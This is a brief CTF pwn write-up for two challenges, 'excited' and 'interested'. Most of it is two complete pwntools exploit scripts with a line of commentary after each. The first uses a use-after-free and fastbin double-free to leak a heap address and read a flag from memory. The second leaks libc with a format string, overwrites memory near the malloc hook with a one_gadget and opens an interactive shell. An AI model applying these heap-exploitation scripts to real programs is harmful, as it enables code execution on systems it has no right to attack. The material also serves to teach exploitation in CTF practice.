pwn 的有趣的题目

excited

UAF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from pwn import *
p = process("./excited")
elf = ELF("./excited")
#context.log_level='debug'
libc = elf.libc
def so():
	gdb.attach(p)
	pause()
def new(balength,bacontent,nalength,nacontent):
	p.sendlineafter('do :','1')
	p.sendlineafter('length : ',str(balength))
	p.sendlineafter('> ba : ',bacontent)
	p.sendlineafter('length : ',str(nalength))
	p.sendlineafter('> na : ',nacontent)
def show(ind):
	p.sendlineafter('do :','4')
	p.sendlineafter('SCP project ID : ',str(ind))
def free(ind):
	p.sendlineafter('do :','3')
	p.sendlineafter('Banana ID : ',str(ind))

#leak heap
new(0x20,'0'*0x10,0x20,'1'*0x10)#0
free(0)
show(0)
p.recvuntil('na is ')
heap=u64(p.recvline()[0:4].ljust(8,'\x00'))
print hex(heap)
new(0x70,'2'*0x10,0x60,'3'*0x10)#1
new(0x70,'4'*0x10,0x60,'5'*0x10)#2
free(1)
free(2)
free(1)
new(0x60,p64(heap+0x140)+'6'*80+p64(0x7f),0x60,'7'*0x10)#3

new(0x60,'a'*16,0x70,'9'*0x50)#4
new(0x60,'a'*16+p64(0x6020A8),0x70,'9'*0x50)#4
show(4)
p.recvuntil('ba is ')
print p.recv()

Because this question had already read flag into the memory , so we can use pointer which point content to read flag .

interested

UAF too

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
from pwn import *
p = process("./interested")
elf = ELF("./interested")
context.log_level='debug'
libc = elf.libc
def so():
	gdb.attach(p)
	pause()
def add(balength,bacontent,nalength,nacontent):
	p.sendlineafter('do :','1')
	p.sendlineafter('length : ',str(balength))
	p.sendafter('O :',bacontent)
	p.sendlineafter('length :',str(nalength))
	p.sendafter('RE :',nacontent)
def edit(ind,bacontent,nacontent):
	p.sendlineafter('do :','2')
	p.sendlineafter('ID : ',str(ind))
	p.sendlineafter('O :',bacontent)
	p.sendlineafter('RE :',nacontent)
def free(ind):
	p.sendlineafter('do :','3')
	p.sendlineafter('ID : ',str(ind))
def show(ind):
	p.sendlineafter('do :','4')
	p.sendlineafter('ID : ',str(ind))

p.sendafter('please:','OreOOrereOOreO%p.%p')
#0x3c6780
p.sendlineafter('do :','0')
p.recvuntil('OreOOrereOOreO')
data = p.recvuntil('\n')
libc = int(data.split('0x')[2],16)-0x3c6780
one = libc+0xf1147
print hex(libc)
add(0x60,'a',0x50,'b')#1
add(0x60,'c',0x50,'d')#2
add(0x20,'e',0x20,'f')#3
free(1)
free(2)
free(1)
edit(1,p64(libc+0x3c4b10-0x23),p64(libc+0x3c4b10-0x23))
add(0x60,'a',0x60,'a'*(0x13)+p64(one))
#add(0x60,'a'*(0x13)+p64(one),0x20,'b'*0x20)
#so()
p.interactive()

There are too many loopholes in this question .